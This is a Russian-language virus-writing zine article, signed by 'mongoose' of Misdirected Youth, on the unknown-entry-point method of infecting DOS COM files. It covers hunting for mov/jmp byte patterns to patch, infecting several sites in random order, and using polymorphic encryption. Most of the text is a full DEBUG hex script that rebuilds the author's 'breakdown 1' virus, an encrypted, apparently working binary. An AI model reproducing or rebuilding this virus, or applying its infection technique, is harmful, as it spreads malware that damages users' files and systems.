─[UNKNOWN ENTRY POINT]──────────────────────────────────────────────[MONGOOSE]─


   вступление

    В перерыве  между написанием червя "Khmelnycky" и полиморфного движка Tree
 я решил _разобраться_ с технологией unknown entry  point (далее  uep), о  ре-
 зультатах своего труда я решил сообщить в этой статье.


   unknown entry point tech.

    _Стандарт_ uep еще точно не определен,  т.к. методов заражения файлов реа-
 лизующих технологию  uep довольно много (от простого поиска JMP XXXX и замены
 на вызов вируса, до метода используемого в Zhengxi). Чтобы не внедрить коман-
 ду перехода  на  вирусное  тело в середину инструкции (тем самым не испортить
 программу) нужно искать не байт 0e9h (jmp xxxx), а комбинации комманд, напри-
 мер:

               mov    reg16,reg16     08bh,?
               jmp    xxxx            0e9h,?,?

               mov    reg16,xxxx      0b8h+reg,?
               jmp    xxxx            0e9h,?,?

    Далее заменяем  три первые байта командой перехода на вирусное тело (кото-
 рое можно разместить в конце, области  повторяющихся байт...). Однако это еще
 не делает  наш вирус неизлечимым так как в теле вируса обязательно нужно хра-
 нить адрес измененых байт и три оригинальных байта (можно избавиться от  хра-
 нения адреса подмененых байт используя метод Reminder'а (см.  Chaos A.D. 2)),
 обязательно нужно писать полиморфный движок  для вируса. Совершенно очевидно,
 что вирус  должен _заражать_ не один участок а несколько причем [!] не по по-
 рядку (создаем таблицу с адресами найденых комбинаций, по рандому выбираем из
 таблицы адрес, изменяем  байты, создаем копию и припысываем тело вируса и так
 до тех пор пока не обработаем все участки).

    Чем больше участков мы исправим тем больше шанс вируса получить управление
 (хотя вирус  может и не получить управления или получить, но в крайне  редких
 условиях).

    Обязательно нужно сохранять регистры (потому как они скорее всего  понадо-
 бятся программе).

    Так как  вирус получает управление у нас нет никакой вероятности что прог-
 рамма не затрет часть вируса (или весь). Есть вариант: можно вместо  перехода
 на тело вируса вставлять небольшой инсталятор который получает имя стартовав-
 шего файла, открывает его и  считывает из него вирусный код (на место в кото-
 ром он должен быть расположен) и передает управление на код.

    Если вас  заинтересовала  технология uep очень советую почитать статьи Re-
 minder'а (CHAOS A.D. 2) и FRiZER'а (MooN_BuG 6) на тему симбиоза.


   иллюстрация

    В качестве примера к статье представлен вирус breakdown 1:

────[BD1.SCR]────────[START]───────────────────────────────────────────────────
N BD1.COM
E 0100 E9 E6 03 FC 01 E9 EB 00 90 90 90 90 90 90 90 90 
E 0110 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0120 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0130 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0140 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0150 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0160 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0170 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0180 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0190 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 01A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 01B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 01C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 01D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 01E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 01F0 90 90 90 CD 21 B4 09 2B ED E9 F2 00 E4 A0 A7 A0 
E 0200 20 31 24 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0210 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0220 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0230 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0240 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0250 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0260 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0270 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0280 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0290 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 02A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 02B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 02C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 02D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 02E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 E9 DD 
E 02F0 05 E9 EB 00 90 90 90 90 90 90 90 90 90 90 90 90 
E 0300 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0310 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0320 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0330 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0340 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0350 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0360 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0370 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0380 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0390 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 03A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 03B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 03C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 03D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 CC 
E 03E0 0B ED 75 02 CD 21 B8 00 00 EB 01 90 CD 16 E9 C2 
E 03F0 08 CD 21 20 E4 A0 A7 A0 20 32 24 90 90 90 90 90 
E 0400 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0410 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0420 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0430 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0440 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0450 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0460 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0470 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0480 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 0490 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 04A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 04B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 04C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 04D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
E 04E0 90 90 90 90 90 90 90 90 90 06 56 52 55 57 1E 51 
E 04F0 50 53 BE 02 05 B8 46 A1 B9 E4 01 31 04 46 46 40 
E 0500 E2 F9 8A 44 07 45 08 28 CF BA 67 49 0E A0 CD 4C 
E 0510 55 A0 FA BB C2 37 23 F5 9C 80 ED A1 52 2C E2 72 
E 0520 51 04 F2 15 19 8A 91 2C CF 6C 5E 6C 7A D2 5F 48 
E 0530 A6 A1 E6 A3 62 2C F6 30 35 6C 43 D2 60 48 89 A1 
E 0540 F6 2A E0 2C 33 9C B0 6C 1B A2 83 76 6B 9C A0 A2 
E 0550 1A A2 87 6E 6F 15 4F 18 73 A1 FF 37 6E 8C B9 80 
E 0560 F6 1F 68 8C 2D D4 7B 48 C3 A1 C2 A3 39 18 83 5E 
E 0570 F6 70 34 6C 5E 15 BF 18 83 A1 0F 37 9E 8C 49 80 
E 0580 05 1F 9B 8C CA D4 8B 48 13 A1 A1 61 63 97 8D 19 
E 0590 8D E3 A5 68 16 6C B1 15 AE 18 82 86 1E 37 89 8C 
E 05A0 1E 53 5B 80 1C 69 B3 61 19 9D 11 D4 9D 21 E0 A3 
E 05B0 74 D5 82 13 27 99 B4 D4 AC 21 DE A2 4A D5 B4 20 
E 05C0 D9 A2 6B 80 D3 A8 EA 21 53 61 DF 48 40 BE 3C F1 
E 05D0 FC 18 AC A1 58 40 3D 1F 9C F5 B1 59 38 67 39 2F 
E 05E0 A8 8C 9D 60 BC 61 CC AA 30 A4 E3 F9 FB E7 81 A9 
E 05F0 BD D5 BC 43 0C AA 00 D5 EA F1 93 2A 0B 49 BB A3 
E 0600 7C A3 C6 56 26 2C 7E 8C 9D A2 3A 2A CF AA 0C D4 
E 0610 C8 F8 96 4A C4 31 17 A5 D1 A1 3A 09 D3 F8 8C E0 
E 0620 EE 69 AA 74 63 9F 15 80 6D EE 33 5F 25 15 C6 1B 
E 0630 5D A1 13 80 13 FA B8 F8 FE FE BF FB BD A6 8C A1 
E 0640 E4 62 84 D3 82 C0 83 C5 86 D6 84 81 B0 C0 80 D1 
E 0650 85 C0 B3 FC BA 62 49 A8 F1 F0 D9 73 7E 17 E9 8C 
E 0660 33 A5 F6 E7 15 5B A1 F0 40 A8 FA F3 13 B1 FE FB 
E 0670 70 17 3A A5 FC 51 8A A6 8C 1C 1F 8F BA AB 04 9A 
E 0680 00 D7 02 E4 5E 49 E8 E5 EB 57 87 14 16 8F 0F 50 
E 0690 85 A6 57 2F B9 84 3D A1 E0 2A 16 E0 55 40 DC 1B 
E 06A0 1C A2 9B 14 30 8F 98 9E 59 DE 1C 22 1F AA F7 A1 
E 06B0 8D 5C 1A E4 FD 52 AD 14 3C 8F AF 1C E7 A6 9D AB 
E 06C0 25 5E D5 06 E4 F2 A3 72 91 A2 68 89 E2 6F 0D 4A 
E 06D0 A9 5D 9A 9D 96 A1 30 2F A7 71 36 6F 12 2F 8A 75 
E 06E0 61 2F 80 AE 36 1B F4 A1 C5 51 9E FA 6B A7 3C A3 
E 06F0 B0 1C E9 F6 BC 65 59 2B 44 23 85 86 42 2B 41 2F 
E 0700 FB 75 12 23 80 91 49 2F FF 85 67 1B 42 A2 B0 51 
E 0710 E9 FA C5 5A 18 1A 52 E0 7A 6B CB 6F 72 F2 79 A1 
E 0720 55 89 91 64 D1 BA 75 4B D0 24 43 8F 03 2F E2 01 
E 0730 05 2F E8 66 5B 1B 69 A2 62 63 9E 51 C7 A7 64 A3 
E 0740 E8 14 B1 F6 DE 44 69 18 A5 A1 82 80 6B 21 AD AB 
E 0750 FD 16 2E 2F F9 01 28 6F 50 FD CA A2 31 89 BD 25 
E 0760 A2 6F 57 16 37 1B 7B A2 F4 34 62 8F B6 83 BF F2 
E 0770 2F F1 29 F4 2A 4A 87 A2 DC FC DD F9 D9 FA 47 4A 
E 0780 85 A2 DB 23 6A 2E 8B EB C0 2B 0C D8 8F 2B 02 DF 
E 0790 89 29 44 F3 D9 47 D0 46 D1 2B 14 BE BE 2B 12 22 
E 07A0 91 F5 2F A1 97 4A 4F A2 14 14 27 A6 98 52 1C 9E 
E 07B0 9C D6 71 A9 5F D6 B0 9E A0 D6 BE 64 A7 A3 29 14 
E 07C0 DA A6 03 06 4C B8 38 64 AD A3 27 14 D2 A6 08 2B 
E 07D0 13 62 AA 07 44 A8 20 64 B5 A3 3F 14 CF A6 11 06 
E 07E0 38 14 0B A6 37 9E B9 D7 00 23 C6 A3 BA A3 C9 10 
E 07F0 30 14 3C A6 1A 1B C3 A2 29 26 C2 2F 75 1F C0 A1 
E 0800 35 22 FA A2 B3 4D C3 62 BD AD F6 A3 BF B4 0A A6 
E 0810 CD 2F 78 26 CB 06 3B B6 41 64 D6 A2 5E 14 51 A6 
E 0820 71 49 DF 32 11 A6 D8 2F 6F 24 DE 06 56 14 61 A6 
E 0830 5D 9E DE D7 1F 21 9C A3 E1 D7 58 2F 55 25 E0 07 
E 0840 6E 65 B9 FC BE F2 C3 65 60 24 28 A6 60 1C 2C A6 
E 0850 EC A7 B6 35 BE F5 0C 51 55 FD 79 24 73 A6 7F 2C 
E 0860 88 A6 C7 A7 B0 E5 B8 40 00 FB F9 2C 39 A6 3F 1C 
E 0870 FD A2 47 A2 FF 1A 00 A3 30 A7 44 E5 43 41 FD F0 
E 0880 8E 25 1D 8E BC A6 09 54 EA A8 CA D7 02 18 FD 5C 
E 0890 FA 50 05 71 7A A4 EF 25 0A 8E 49 48 F1 2A 82 B8 
E 08A0 38 31 3D 71 1C 63 6D A5 59 A8 D3 D6 1A E2 EB 52 
E 08B0 8F F8 DD A3 1F A3 20 A3 21 A3 24 F5 71 F6 73 BD 
E 08C0 74 F3 75 89 09 C0 47 CE 29 17 09 BA 4D 59 1E 53 
E 08D0 51 50 52 06 56 55 57 B9 E4 01 BE E7 08 B8 B6 D4 
E 08E0 31 04 46 40 46 E2 F9 7A 31 F7 30 F8 5D 3F CF 97 
E 08F0 3C FE D5 3D 39 A5 D5 0A CE 32 42 B3 80 0C F5 7D 
E 0900 3A C1 59 72 07 C1 71 62 60 89 FF 01 59 5F 19 CE 
E 0910 19 EA A7 CF 3D 36 D4 76 D6 F2 59 46 45 85 19 F3 
E 0920 A7 D0 3D 39 D4 46 5F 50 59 83 E9 00 19 AB D7 33 
E 0930 03 DB E9 10 D7 AA D7 37 1B DF 60 DF 6D E3 D4 6F 
E 0940 42 FE F9 29 F5 66 6A F8 F9 BD A1 EB 3D 53 D4 52 
E 0950 D6 A9 6D 13 2B 66 05 A4 19 CE 60 CF 6D F3 D4 7F 
E 0960 42 EE F9 39 F5 75 6A EB F9 BA A1 FB 3D 63 D4 D1 
E 0970 14 13 E2 FD 6C FD 96 D5 1D 66 19 21 61 3E 6C 12 
E 0980 F2 8E 43 19 F8 8E 27 CB F4 8C 1D 23 15 89 E9 81 
E 0990 A0 0D 55 70 D7 E4 A1 12 67 B7 ED 04 A0 1C 55 6E 
E 09A0 D6 FA A1 04 54 69 D6 DB F4 63 DC 5A 55 E3 15 6F 
E 09B0 3C F0 CA 8C 85 4C 6C 1C D5 E8 34 AD 6B 0C 81 21 
E 09C0 2D A8 13 A9 5B 38 F8 0D 14 2C 15 5C DE A0 D0 73 
E 09D0 8D 6B 93 11 DD 2D A1 2C 37 9C DE F0 A1 1A 85 63 
E 09E0 5E FB 3D 4B D7 8C D7 36 22 D6 58 8E F8 6D D6 CA 
E 09F0 5E 3F DE FC A0 38 8C 66 3E 34 45 87 D1 41 D5 AA 
E 0A00 7D 43 8C 1C 94 7E 1D 3A 00 F3 EB 85 F4 FD 9A A3 
E 0A10 2B B5 61 56 6F CD D5 83 F4 83 8A 0D 8B 56 8F 0A 
E 0A20 8C 08 CA 3C 3B 57 16 34 A7 32 B4 33 B1 36 A2 34 
E 0A30 F5 00 B4 30 A5 35 B4 03 88 0A 16 D9 DC 61 84 49 
E 0A40 07 EE 63 79 F8 A3 D1 66 93 85 2F 31 84 D0 DC 6A 
E 0A50 87 83 C5 6E 8F E0 63 AA D1 6C 25 FA D1 FC 6B 6F 
E 0A60 F8 CA DC 74 ED 70 A0 72 93 2E 3E 98 92 9B 20 F7 
E 0A70 63 66 F8 7F 27 F5 D1 27 58 C9 F3 AD D6 70 5D 86 
E 0A80 97 C5 37 4C 6C 8C D5 0B 63 A0 F8 08 E9 C9 A9 8C 
E 0A90 55 8F DD 67 D6 1D 2B 8A 93 6D 25 1D 63 8C F8 1F 
E 0AA0 6B 57 D1 2D DC 95 29 65 71 54 85 13 05 21 D5 D8 
E 0AB0 FE 52 18 BD 3D 19 2A 2A EA 26 D6 A0 58 37 06 A6 
E 0AC0 18 82 58 1A 02 F1 58 10 D9 A6 6C 64 D6 55 26 0E 
E 0AD0 8D FB D0 AC D4 20 6B 79 81 2C 12 A9 5C B4 54 75 
E 0AE0 F1 B2 5C B1 58 0B 02 E2 54 70 E6 B9 58 0F F2 97 
E 0AF0 6C B2 D5 40 26 19 8D 35 2D E8 6D C2 97 EA 1C 5B 
E 0B00 18 E2 85 E9 D6 C5 FE 01 13 41 CD E5 3C 40 53 D3 
E 0B10 F8 93 58 72 76 95 58 78 11 CB 6C D9 D5 D2 14 2E 
E 0B20 26 77 D0 D4 D4 58 63 01 81 6E 33 D9 6F 15 D6 32 
E 0B30 F7 DB 56 1D DC 4D 61 9E 58 49 76 B8 18 C0 8A 5A 
E 0B40 D5 A1 FE 2D 52 32 18 C7 61 A7 6C EB D5 64 43 F2 
E 0B50 F8 26 F4 2F 85 BF 86 B9 83 BA 3D F7 D5 AC 8B AD 
E 0B60 8E A9 8D 37 3D F5 D5 AB 54 1A 59 FB 9C B0 5C 7C 
E 0B70 AF FF 5C 72 A8 F9 5E 34 84 A9 30 40 32 41 5F 84 
E 0B80 CA 2E 5F 82 56 01 81 BF D5 07 3E DF D6 84 60 B7 
E 0B90 D2 08 26 8C EA 0C A2 E1 DD CF A2 00 EA 10 A2 0E 
E 0BA0 10 17 D7 99 60 6A D2 B3 72 FC CC 88 10 1D D7 97 
E 0BB0 60 62 D2 B8 5F A3 16 1A 73 F4 DC B0 10 25 D7 AF 
E 0BC0 60 5F D2 81 72 A8 60 9B D2 A7 EA 29 A3 90 57 56 
E 0BD0 D7 2A D7 59 64 A0 60 AC D2 8A 6F 33 D6 D9 52 32 
E 0BE0 5B 85 6B 30 D5 C5 56 0A D6 43 39 33 16 4D D9 06 
E 0BF0 D7 4F C0 FA D2 3D 5B 88 52 3B 72 AB C2 D1 10 46 
E 0C00 D6 CE 60 C1 D2 E1 3D 4F 46 81 D2 48 5B FF 50 4E 
E 0C10 72 C6 60 F1 D2 CD EA 4E A3 8F 55 2C D7 51 A3 E8 
E 0C20 5B E5 51 50 73 DE 11 09 88 0E 86 73 11 D0 50 98 
E 0C30 D2 D0 68 9C D2 5C D3 06 41 0E 81 9C 25 C5 89 E9 
E 0C40 50 E3 D2 EF 58 18 D2 57 D3 20 91 28 34 90 8F 69 
E 0C50 58 A9 D2 AF 68 9F D2 D7 32 6E 6E 36 77 40 D2 34 
E 0C60 90 33 34 8D 85 FE 50 6D FB CC D3 79 21 9A DD BA 
E 0C70 A2 72 6D 8D 29 8A 25 75 04 0A D1 7F 50 9A FB D9 
E 0C80 3D 61 5F 12 CD A8 44 AD 04 8C 16 FD D0 C9 DD 43 
E 0C90 A3 8A 97 7B 27 1F 8D 4D D6 8F D6 D2 BA 81 D6 8C 
E 0CA0 85 C2 86 C6 D0 C3 83 C1 FC B9 B5 F7 BB 99 6C F3 
E 0CB0 03 4D 59 50 55 1E 52 06 51 57 53 56 B8 74 03 B9 
E 0CC0 E4 01 BE CC 0C 31 04 40 46 46 E2 F9 B8 E6 35 E7 
E 0CD0 36 8A F1 18 55 EB 3C 02 FB EE 63 02 C8 19 F0 95 
E 0CE0 0D 57 B2 22 3F ED 82 8E 34 D0 87 A6 20 B7 CB 28 
E 0CF0 4F 8E 11 CE 8C CE A8 70 89 EA 70 03 34 01 B0 8E 
E 0D00 18 92 DB CE B1 70 92 EA 7F 03 00 88 12 8E C1 3E 
E 0D10 4E CE E5 00 71 D4 99 3E 56 00 EC 00 75 CC 9D B7 
E 0D20 A1 BA 9D 03 2D 95 BC 2E 6F 22 20 BD BA 2E FF 76 
E 0D30 A5 EA 1D 03 10 01 EB BA 55 FC 20 D2 E6 CE 8C B7 
E 0D40 91 BA AD 03 3D 95 AC 2E 7F 22 33 BD A9 2E F8 76 
E 0D50 B5 EA 2D 03 93 C3 51 35 BB BB BB 41 97 CA 24 CE 
E 0D60 9F B7 80 BA D0 24 4C 95 DF 2E 48 F1 09 22 4E CB 
E 0D70 ED C3 47 3F 43 76 CF 83 B6 01 22 77 D0 B1 75 3B 
E 0D80 DA 76 C2 83 AC 00 38 77 C2 82 AF 00 19 22 A1 0A 
E 0D90 94 83 2D C3 AD EA 32 1C 4A 53 8A BA DE 03 2A E2 
E 0DA0 53 BD F2 57 E3 FB 6A C5 6F 8D FE 2E CF C2 EE C3 
E 0DB0 92 08 6E 06 B1 5B A9 45 D7 0B EB 77 EE E1 5E 08 
E 0DC0 2E 77 C4 53 A1 88 39 EB 8D 01 4A 01 F4 F4 14 8E 
E 0DD0 40 2E A3 00 08 88 FD 08 3A 76 FE 5A A4 E8 F6 93 
E 0DE0 39 07 FF 03 E8 AC 01 5D 5A 45 38 CC 78 D1 B1 3A 
E 0DF0 CB 25 B3 4B E1 FA F7 B0 10 BE 8B 04 C1 25 C1 5A 
E 0E00 55 5B 56 03 4A 1B 4C 5C 7A EA 10 C7 76 76 70 65 
E 0E10 7D 60 78 73 76 24 42 65 76 74 73 65 41 59 48 C7 
E 0E20 A7 0D 1F 55 0B D6 AC B2 3F 29 E5 00 24 42 C7 FE 
E 0E30 7F 55 9E 0D 28 56 C1 14 28 5E A6 B2 E8 00 2E F4 
E 0E40 A4 00 A2 BA 2D 29 88 0D 32 3C 36 71 30 42 6C EF 
E 0E50 D6 43 D5 F1 B5 B2 24 29 39 F6 B3 00 65 89 8B 22 
E 0E60 13 07 CE 8C 44 46 07 E6 8A BD 4A 04 C9 B2 62 29 
E 0E70 C6 38 07 78 4E 84 4D 0C A1 07 DB FA 48 42 AF F4 
E 0E80 C3 B2 52 29 DD BA 95 00 EB 0D 53 F8 A7 A0 96 54 
E 0E90 DD D4 EF 04 1A 2F 90 C9 7B EC DF FB E8 3B E4 07 
E 0EA0 5E 89 C9 D7 64 C9 40 89 DC D3 37 89 D2 08 64 BD 
E 0EB0 AA 07 9B F7 CC 5C 39 01 6A 05 E6 BA BB 50 EE C3 
E 0EC0 77 8D 6A 85 B7 20 70 8D 77 89 CD D3 20 85 B2 37 
E 0ED0 77 89 C1 23 55 BD 70 04 86 F7 DF 5C F7 FC 2A BC 
E 0EE0 7C 46 54 CD 19 C9 A0 54 AF 07 83 2F 43 C2 03 1C 
E 0EF0 AB ED 0E 82 91 29 D1 89 34 A7 D3 89 3A C0 89 BD 
E 0F00 87 04 8C C5 6C F7 35 01 92 05 1E B2 43 50 2C E2 
E 0F10 97 BE 5B 07 70 26 99 87 5B 0D 0B B0 DC 89 0B A7 
E 0F20 C6 C9 BE 5B 18 04 E3 2F 6B 83 74 C9 85 B0 E5 BD 
E 0F30 A5 04 2A 92 B0 29 64 25 69 54 F9 57 FB 52 F8 EC 
E 0F40 A9 04 F2 5A EF 5F EB 5C 71 EC B3 04 E9 85 58 88 
E 0F50 B5 4D FE 8D 3E 7E BD 8D 34 79 BF 8F 76 55 EB E1 
E 0F60 FE E0 FF 8D 46 18 EC 8D 44 84 C7 53 7D 07 C5 EC 
E 0F70 11 04 4A B2 75 00 CA F4 4A 38 CA 70 23 0F 0D 70 
E 0F80 DE 38 CE 70 CC C2 D5 05 5F B2 AC 00 71 A0 3E 1E 
E 0F90 46 C2 D3 05 55 B2 A0 00 7E 8D 65 C4 D8 A1 36 0E 
E 0FA0 4E C2 DB 05 6D B2 9D 00 47 A0 6E B2 59 00 65 38 
E 0FB0 E7 71 5E 85 94 05 E8 05 9F B6 66 B2 6E 00 48 BD 
E 0FC0 ED 04 07 80 F0 89 47 B9 F6 07 03 84 C8 04 81 EB 
E 0FD0 FD C4 83 0B C4 05 8D 12 3C 00 FB 89 4A 80 F9 A0 
E 0FE0 15 10 6F C2 04 05 8C B3 87 01 A7 EE 0D 95 C3 01 
E 0FF0 06 88 B1 83 0C A1 84 B3 B7 01 8B 39 0C 70 CD 86 
E 1000 72 04 0F 70 AA 88 A7 82 16 A0 98 C2 4B 5B 4C 55 
E 1010 3D C2 9E 83 DA 01 92 BB DA 01 1A 00 44 92 4C 52 
E 1020 E2 F6 BB 5A AB 83 A1 01 A9 8B 5E 01 15 00 62 42 
E 1030 66 E7 DE 5C 2B 8B EB 01 E9 BB FC 0D 95 E1 2C BD 
E 1040 98 D1 1E 01 76 43 71 E7 CB 56 B8 83 2F 28 8E 00 
E 1050 37 F2 D4 0E F8 71 30 BE CB FA CC F6 37 D7 48 02 
E 1060 C1 83 24 28 1B EE A3 8C D4 1E 6E 97 6F D7 4E C5 
E 1070 33 03 07 0E 81 70 48 44 BD F4 D9 5E 8F 05 4D 05 
E 1080 0B 69 5F 05 00 50 4F 57 54 54 04 56 02 2F 7B 66 
E 1090 39 68 57 BD 00 4C 4D 59 
RCX
0F98
W
Q
────[BD1.SCR]────────[END]─────────────────────────────────────────────────────

                                  (c) by mongoose, soldier of Misdirected Youth